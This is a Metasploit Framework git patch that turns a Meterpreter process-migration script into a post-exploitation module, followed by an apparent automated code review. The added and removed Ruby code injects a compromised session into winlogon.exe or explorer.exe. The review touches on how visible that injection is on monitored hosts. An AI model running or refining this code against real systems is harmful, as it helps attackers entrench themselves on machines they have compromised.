From 00b9fb3c90bc853fecf7281225d8cbf589161ce4 Mon Sep 17 00:00:00 2001
From: David Maloney
Date: Wed, 31 Oct 2012 17:03:49 -0500
Subject: [PATCH] Switc smart mgirate to post mod as it should be
---
 .../windows/winrm/winrm_powershell.rb | 2 +-
 modules/post/windows/manage/smart_migrate.rb | 73 +++++++++++++++++++
 scripts/meterpreter/smart_migrate.rb | 43 -----------
 3 files changed, 74 insertions(+), 44 deletions(-)
 create mode 100644 modules/post/windows/manage/smart_migrate.rb
 delete mode 100644 scripts/meterpreter/smart_migrate.rb
diff --git a/modules/exploits/windows/winrm/winrm_powershell.rb b/modules/exploits/windows/winrm/winrm_powershell.rb
index 8ae8dc2fe0..0f55882965 100644
--- a/modules/exploits/windows/winrm/winrm_powershell.rb
+++ b/modules/exploits/windows/winrm/winrm_powershell.rb
@@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
 {
 'WfsDelay' => 30,
 'EXITFUNC' => 'thread',
- 'InitialAutoRunScript' => 'smart_migrate',
+ 'InitialAutoRunScript' => 'post/windows/manage/smart_migrate',
 },
 'Platform' => 'win',
 'Arch' => [ ARCH_X86, ARCH_X86_64 ],
diff --git a/modules/post/windows/manage/smart_migrate.rb b/modules/post/windows/manage/smart_migrate.rb
new file mode 100644
index 0000000000..dd3a8b5fe8
--- /dev/null
+++ b/modules/post/windows/manage/smart_migrate.rb
@@ -0,0 +1,73 @@ +## +# $Id$ +## + +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' + +class Metasploit3 < Msf::Post + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Windows Manage Process Migration', + 'Description' => %q{ This module will migrate a Meterpreter session. + It will first attempt to mgirate to winlogon.exe . If that fails it will + then look at all of the explorer.exe processes. If there is one that exists + for the user context the session is already in it will try that. Failing that it will fall back + and try any other explorer.exe processes it finds}, + 'License' => MSF_LICENSE, + 'Author' => [ 'thelightcosine'], + 'Version' => '$Revision$', + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ] + )) + + + end + + def run + server = client.sys.process.open + original_pid = server.pid + print_status("Current server process: #{server.name} (#{server.pid})") + + uid = client.sys.config.getuid + + processes = client.sys.process.get_processes + + uid_explorer_procs = [] + explorer_procs = [] + winlogon_procs = [] + processes.each do |proc| + uid_explorer_procs << proc if proc['name'] == "explorer.exe" and proc["user"] == uid + explorer_procs << proc if proc['name'] == "explorer.exe" and proc["user"] != uid + winlogon_procs << proc if proc['name'] == "winlogon.exe" + end + + winlogon_procs.each { |proc| return if attempt_migration(proc['pid']) } + uid_explorer_procs.each { |proc| return if attempt_migration(proc['pid']) } + explorer_procs.each { |proc| return if attempt_migration(proc['pid']) } + + print_error "Was unable to sucessfully migrate into any of our likely candidates" + end + + + def attempt_migration(target_pid) + begin + print_good("Migrating to #{target_pid}") + 
client.core.migrate(target_pid)
+ print_good("Successfully migrated to process #{}")
+ return true
+ rescue ::Exception => e
+ print_error("Could not migrate in to process.")
+ print_error(e)
+ return false
+ end
+ end
+end
diff --git a/scripts/meterpreter/smart_migrate.rb b/scripts/meterpreter/smart_migrate.rb
deleted file mode 100644
index aa4a93f3bf..0000000000
--- a/scripts/meterpreter/smart_migrate.rb
+++ /dev/null
@@ -1,43 +0,0 @@
-# $Id$
-# $Revision$
-#
-
-
-def attempt_migration(target_pid)
- begin
- print_good("Migrating to #{target_pid}")
- client.core.migrate(target_pid)
- print_good("Successfully migrated to process #{}")
- return true
- rescue ::Exception => e
- print_error("Could not migrate in to process.")
- print_error(e)
- return false
- end
-end
-
-if client.platform =~ /win32|win64/
- server = client.sys.process.open
- original_pid = server.pid
- print_status("Current server process: #{server.name} (#{server.pid})")
-
- uid = client.sys.config.getuid
-
- processes = client.sys.process.get_processes
-
- uid_explorer_procs = []
- explorer_procs = []
- winlogon_procs = []
- processes.each do |proc|
- uid_explorer_procs << proc if proc['name'] == "explorer.exe" and proc["user"] == uid
- explorer_procs << proc if proc['name'] == "explorer.exe" and proc["user"] != uid
- winlogon_procs << proc if proc['name'] == "winlogon.exe"
- end
-
- winlogon_procs.each { |proc| return if attempt_migration(proc['pid']) }
- uid_explorer_procs.each { |proc| return if attempt_migration(proc['pid']) }
- explorer_procs.each { |proc| return if attempt_migration(proc['pid']) }
-
- print_error "Was unable to sucessfully migrate into any of our likely candidates"
-
-end
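Review bot: The success message in attempt_migration has an empty interpolation, `print_good("Successfully migrated to process #{}")`, so the pid the session just moved into is never printed; it should be `print_good("Successfully migrated to process #{target_pid}")`. The `rescue ::Exception => e` a few lines below also swallows Interrupt and SystemExit, so a Ctrl-C during a hung migrate is reported as "Could not migrate" and the loop silently moves on to the next candidate; `rescue ::StandardError => e` keeps the fall-through-on-failure behaviour without masking interrupts. In run, `original_pid` is assigned but never read and none of the candidate lists exclude it, so when the session already lives in winlogon.exe or explorer.exe the module will attempt to migrate into its own process; skipping entries with `proc['pid'] == original_pid` when the lists are built avoids that. Since winlogon.exe is a SYSTEM process, the first attempt will in practice only succeed from an elevated session and is a high-visibility injection target on monitored hosts, which the Description could state so operators understand the fallback to explorer.exe. The Description and the final print_error also carry typos ("mgirate", "sucessfully").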